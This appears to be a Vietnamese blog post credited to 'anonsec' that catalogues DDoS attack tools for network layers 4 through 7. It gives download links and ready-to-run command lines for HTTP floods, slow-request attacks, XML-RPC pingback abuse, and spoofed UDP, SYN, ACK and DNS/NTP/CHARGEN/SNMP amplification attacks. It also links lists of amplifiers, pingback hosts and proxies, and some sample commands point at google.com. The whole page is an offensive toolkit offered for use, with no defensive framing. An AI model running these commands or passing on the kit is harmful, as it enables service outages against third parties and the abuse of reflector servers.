DDos Scripts Layer 4 đến Layer 7

Layer 7

ARME (For Apache Servers)
http://www.mediafire.com/view/5evl45bx12jvod8/arme.c
./arme http://google.com 5000 proxies.txt 3600 0

GHP (Get / Head / Post )
http://www.mediafire.com/view/h1k0rnot5x55x1m/ghp.c
./ghp http://google.com GET 5000 proxies.txt 3600 0 %random%

Hulk (Python)
http://www.mediafire.com/view/zzayd073xt6xj5f/hulk.py
python hulk.py http://google.com

Rand (Perl)
http://www.mediafire.com/view/5f0188o19kkz5d8/Rand.pl
perl rand.pl http://google.com 3600

R.U.D.Y
http://www.mediafire.com/view/mf9qhehd95dru69/rudy.c
./rudy http://google.com 1 5000 proxies.txt 3600 0 %random%

SlowLoris
http://www.mediafire.com/view/6an1elr7wz32gqx/slow.c
./slow http://google.com 5000 proxies.txt 3600 0

XML-RPC Pingback ( C version )
http://www.mediafire.com/download/ppo0kpcf699qv1l/xml
./xml http://google.com xml.txt 10000 3600

XML-RPC Pingback ( Perl Version )
http://pastebin.com/LXzyrYrB
perl xml.pl http://google.com/ 10000 xmlrpc.txt 3600

XML-RPC Pingback ( PHP Version )
http://pastebin.com/UPu1hd3g
php xml.php xml.txt 10000

007 Goldeneye
http://pastebin.com/FtBTrB15
python 007.py http://google.com

Pyloris
http://sourceforge.net/projects/pyloris/
python pyloris.py http://google.com 80 0 3600 200 60000 2

Layer 4

Fragmentation Script !
https://www.mediafire.com/?34adxv2nhtp8313
./fragmentation 192.154.22.10

DNS AMP (UDP)
http://pastebin.com/D2RSDd9X
./amp 127.0.0.1 80 amp.txt 2 3600

CHARGEN
http://pastebin.com/iteE3FsC
./chargen 127.0.0.1 80 chargen.txt 2 -1 3600

TCP (Advanced ESSYN)
http://pastebin.com/b0KAM2up
./tcp 127.0.0.1 80 2 -1 3600

SNMP (C Version)
http://pastebin.com/0paGRUiU

SNMP (Python Version)
http://pastebin.com/0C3gBJ8S
./snmp -t 127.0.0.1 -f snmp.txt -l 30

Spoofed UDP
http://pastebin.com/8HS7baKd
./sudp 127.0.0.1 80 5 5 3600

NTP (Python)
http://pastebin.com/Rgq3mWem
python ntp.py 127.0.0.1 ntp.txt 5

NTP (Perl)
http://pastebin.com/9kGK4HeB
perl ntp.pl 127.0.0.1 80 3600 ntp.txt 5

DrDos
http://pastebin.com/xxm6QbmH
perl drdos.pl 127.0.0.1 80 servers.txt 5 tcp 10 3600

Haven
http://www.mediafire.com/download/2r5dm6d6ewb9w2w/haven
./haven -d 127.0.0.1 -s 255.255.255.255 -t 3600 -z 30

ACK
http://www.mediafire.com/download/7ojx7bawpnw25ch/ack
./ack 127.0.0.1 3600

Lists !

DNS AMP ( Domain Format )

List 1 http://pastebin.com/5g8U1KXD
List 2 http://pastebin.com/qannUPH6
List 3 http://pastebin.com/C2ef6zm7
List 4 http://www.mediafire.com/view/a9akhwfdmgafz0a/DNS043014.txt

CHARGEN AMP (IP Format )

http://pastebin.com/U4U5Ndhu

Pingback List !

https://www.mediafire.com/?obx6opa4oqbl85b

Fresh Proxy List

List 1 http://pastebin.com/caJVz4y0
List 2 http://pastebin.com/z0y0VPVG

Hulk + xmlrpc
http://pastebin.com/EpSBD563
http://pastebin.com/wr8npJie
http://pastebin.com/YW0zDXcs
http://www.mediafire.com/view/zzayd073xt6xj5f/hulk.py

nguồn anonsec

0 nhận xét:

Copyright © 2013 2 USD Hình Con Chó 2018|TienLiXiTet.Com|0966.85.0966